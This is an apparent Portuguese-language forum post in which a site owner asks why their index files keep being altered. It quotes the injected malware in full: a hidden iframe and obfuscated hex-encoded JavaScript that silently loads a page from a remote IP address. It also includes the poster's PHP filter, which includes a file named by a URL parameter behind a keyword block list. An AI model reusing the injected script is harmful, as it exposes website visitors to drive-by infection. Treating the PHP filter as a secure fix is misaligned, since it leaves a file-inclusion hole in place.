Script malicioso

Olá pessoal alguns meses atras apareceu umas modificaçãoes nós meus arquivos com nome index.php, index.html, index.htm ou home.php. Tudo que tem haver com (incio).

As modificacoes que esta aparecendo como vírus. E o seguinte codigo

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'>

</iframe>

<script>

function v48001929a77ba(v48001929a7fb2)

{

function v48001929a83ae ()

{return 16;}

return(parseInt(v48001929a7fb2,v48001929a83ae()));}

function v48001929a8ba8(v48001929a8fa3){ function v48001929a9b98 ()

{var v48001929a9f94=2; return v48001929a9f94;} var v48001929a939f='';

for(v48001929a979b=0; v48001929a979b<v48001929a8fa3.length; v48001929a979b+=v48001929a9b98())

{

v48001929a939f+=(String.fromCharCode(v48001929a77ba(v48001929a8fa3.substr(v48001

929a979b, v48001929a9b98()))));

}

return v48001929a939f;}

document.write(v48001929a8ba8('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E

777269746528273C696672616D65206E616D653D643335207372633D5C27687474703A2F2F37372E3

232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D617468

2E72616E646F6D28292A38313834292B273765376435646261615C272077696474683D39332068656

96768743D3838207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E

27293C2F5343524950543E'));

</script>

OBS: Nao sou eu que estou criando isto, ta aparecendo sozinho.

Eu fiz o seguinte codigo para tentar bloquear este processo de modificacao do meus arquivos ele funcionou por alguns meses mais ontem volto aparecer denovo o mesmo problema.

Codigo.

// Link

$Link = strtr($_GET['ref'], '.:?;|\\', ' ');

if(eregi("http|www|ftp|.dat|.txt|.gif|wget", $Link))

{

echo "Ops! Problemas na página!";

//Se a variavel passada estiver dentro das normas, executa o else abaixo:

}else{

// Confere link

$ConfereLink = explode(" ", $Link);

if(count($ConfereLink) > 1) {

exit;

}

// Arquivo

$Arquivo = "./".$Link.".php";

// Inclui arquivo caso exista

if(file_exists($Arquivo)) {

include("./".$Link.".php");

// Caso contrário redireciona para a página inicial

} else {

@include("./principal.php");

}

}

?>

Se alguem puder me ajudar onde esta sendo este erro e porque ele aparece, eu agradeço muito. Entrei em contato com o servidor eles falam que o servidor esta sem virus algum, mais to achando muito estranho sobre isto.